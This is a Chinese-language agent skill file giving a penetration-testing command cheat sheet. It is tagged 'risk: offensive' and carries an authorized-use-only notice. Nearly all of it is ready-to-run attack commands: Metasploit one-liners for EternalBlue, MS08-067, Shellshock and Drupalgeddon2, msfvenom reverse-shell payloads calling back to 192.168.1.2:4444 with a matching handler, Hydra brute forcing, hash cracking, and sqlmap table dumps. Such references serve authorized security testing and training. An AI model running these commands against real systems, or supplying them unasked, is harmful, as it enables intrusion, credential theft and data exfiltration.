---

name: pentest-commands description: "提供渗透测试工具的全面命令参考，包括网络扫描、漏洞利用、密码破解和Web应用测试。在安全评估期间实现快速命令查找。" risk: offensive source: community author: zebbern date_added: "2026-02-27"

仅限授权使用：本技能仅用于授权的安全评估、防御验证或受控教育环境。

渗透测试命令

用途

提供渗透测试工具的全面命令参考，包括网络扫描、漏洞利用、密码破解和Web应用测试。在安全评估期间实现快速命令查找。

输入/前置条件

• Kali Linux或渗透测试发行版
• 已授权的目标IP地址
• 暴力破解用的字典文件
• 到目标系统的网络访问
• 对工具语法的基本理解

输出/交付物

• 网络枚举结果
• 已识别的漏洞
• 漏洞利用载荷
• 破解的凭据
• Web漏洞发现

核心工作流

1. Nmap命令

主机发现：

# Ping sweep
nmap -sP 192.168.1.0/24

# List IPs without scanning
nmap -sL 192.168.1.0/24

# Ping scan (host discovery)
nmap -sn 192.168.1.0/24

端口扫描：

# TCP SYN scan (stealth)
nmap -sS 192.168.1.1

# Full TCP connect scan
nmap -sT 192.168.1.1

# UDP scan
nmap -sU 192.168.1.1

# All ports (1-65535)
nmap -p- 192.168.1.1

# Specific ports
nmap -p 22,80,443 192.168.1.1

服务检测：

# Service versions
nmap -sV 192.168.1.1

# OS detection
nmap -O 192.168.1.1

# Comprehensive scan
nmap -A 192.168.1.1

# Skip host discovery
nmap -Pn 192.168.1.1

NSE脚本：

# Vulnerability scan
nmap --script vuln 192.168.1.1

# SMB enumeration
nmap --script smb-enum-shares -p 445 192.168.1.1

# HTTP enumeration
nmap --script http-enum -p 80 192.168.1.1

# Check EternalBlue
nmap --script smb-vuln-ms17-010 192.168.1.1

# Check MS08-067
nmap --script smb-vuln-ms08-067 192.168.1.1

# SSH brute force
nmap --script ssh-brute -p 22 192.168.1.1

# FTP anonymous
nmap --script ftp-anon 192.168.1.1

# DNS brute force
nmap --script dns-brute 192.168.1.1

# HTTP methods
nmap -p80 --script http-methods 192.168.1.1

# HTTP headers
nmap -p80 --script http-headers 192.168.1.1

# SQL injection check
nmap --script http-sql-injection -p 80 192.168.1.1

高级扫描：

# Xmas scan
nmap -sX 192.168.1.1

# ACK scan (firewall detection)
nmap -sA 192.168.1.1

# Window scan
nmap -sW 192.168.1.1

# Traceroute
nmap --traceroute 192.168.1.1

2. Metasploit命令

基本用法：

# Launch Metasploit
msfconsole

# Search for exploits
search type:exploit name:smb

# Use exploit
use exploit/windows/smb/ms17_010_eternalblue

# Show options
show options

# Set target
set RHOST 192.168.1.1

# Set payload
set PAYLOAD windows/meterpreter/reverse_tcp

# Run exploit
exploit

常用漏洞利用：

# EternalBlue
msfconsole -x "use exploit/windows/smb/ms17_010_eternalblue; set RHOST 192.168.1.1; exploit"

# MS08-067 (Conficker)
msfconsole -x "use exploit/windows/smb/ms08_067_netapi; set RHOST 192.168.1.1; exploit"

# vsftpd backdoor
msfconsole -x "use exploit/unix/ftp/vsftpd_234_backdoor; set RHOST 192.168.1.1; exploit"

# Shellshock
msfconsole -x "use exploit/linux/http/apache_mod_cgi_bash_env_exec; set RHOST 192.168.1.1; exploit"

# Drupalgeddon2
msfconsole -x "use exploit/unix/webapp/drupal_drupalgeddon2; set RHOST 192.168.1.1; exploit"

# PSExec
msfconsole -x "use exploit/windows/smb/psexec; set RHOST 192.168.1.1; set SMBUser user; set SMBPass pass; exploit"

扫描器：

# TCP port scan
msfconsole -x "use auxiliary/scanner/portscan/tcp; set RHOSTS 192.168.1.0/24; run"

# SMB version scan
msfconsole -x "use auxiliary/scanner/smb/smb_version; set RHOSTS 192.168.1.0/24; run"

# SMB share enumeration
msfconsole -x "use auxiliary/scanner/smb/smb_enumshares; set RHOSTS 192.168.1.0/24; run"

# SSH brute force
msfconsole -x "use auxiliary/scanner/ssh/ssh_login; set RHOSTS 192.168.1.0/24; set USER_FILE users.txt; set PASS_FILE passwords.txt; run"

# FTP brute force
msfconsole -x "use auxiliary/scanner/ftp/ftp_login; set RHOSTS 192.168.1.0/24; set USER_FILE users.txt; set PASS_FILE passwords.txt; run"

# RDP scanning
msfconsole -x "use auxiliary/scanner/rdp/rdp_scanner; set RHOSTS 192.168.1.0/24; run"

Handler设置：

# Multi-handler for reverse shells
msfconsole -x "use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.1.2; set LPORT 4444; exploit"

载荷生成（msfvenom）：

# Windows reverse shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=4444 -f exe > shell.exe

# Linux reverse shell
msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.1.2 LPORT=4444 -f elf > shell.elf

# PHP reverse shell
msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.1.2 LPORT=4444 -f raw > shell.php

# Python reverse shell
msfvenom -p cmd/unix/reverse_python LHOST=192.168.1.2 LPORT=4444 -f raw

# ASP reverse shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=4444 -f asp > shell.asp

# WAR reverse shell
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.2 LPORT=4444 -f war > shell.war

3. 密码破解

Hydra：

# SSH brute force
hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.1

# FTP brute force
hydra -L users.txt -P passwords.txt ftp://192.168.1.1

# HTTP POST form
hydra -l admin -P passwords.txt 192.168.1.1 http-post-form "/login:user=^USER^&pass=^PASS^:F=incorrect"

John the Ripper：

# Crack shadow file
john --wordlist=/usr/share/wordlists/rockyou.txt shadow.txt

# Show cracked passwords
john --show shadow.txt

Hashcat：

# MD5
hashcat -m 0 hashes.txt /usr/share/wordlists/rockyou.txt

# SHA256
hashcat -m 1400 hashes.txt /usr/share/wordlists/rockyou.txt

# NTLM
hashcat -m 1000 hashes.txt /usr/share/wordlists/rockyou.txt

4. Web应用测试

目录枚举：

# Gobuster
gobuster dir -u http://192.168.1.1 -w /usr/share/wordlists/dirb/common.txt

# Dirb
dirb http://192.168.1.1 /usr/share/wordlists/dirb/common.txt

# Nikto
nikto -h http://192.168.1.1

SQL注入（sqlmap）：

# Basic test
sqlmap -u "http://192.168.1.1/page?id=1" --dbs

# Dump database
sqlmap -u "http://192.168.1.1/page?id=1" -D dbname --tables

# Dump table
sqlmap -u "http://192.168.1.1/page?id=1" -D dbname -T users --dump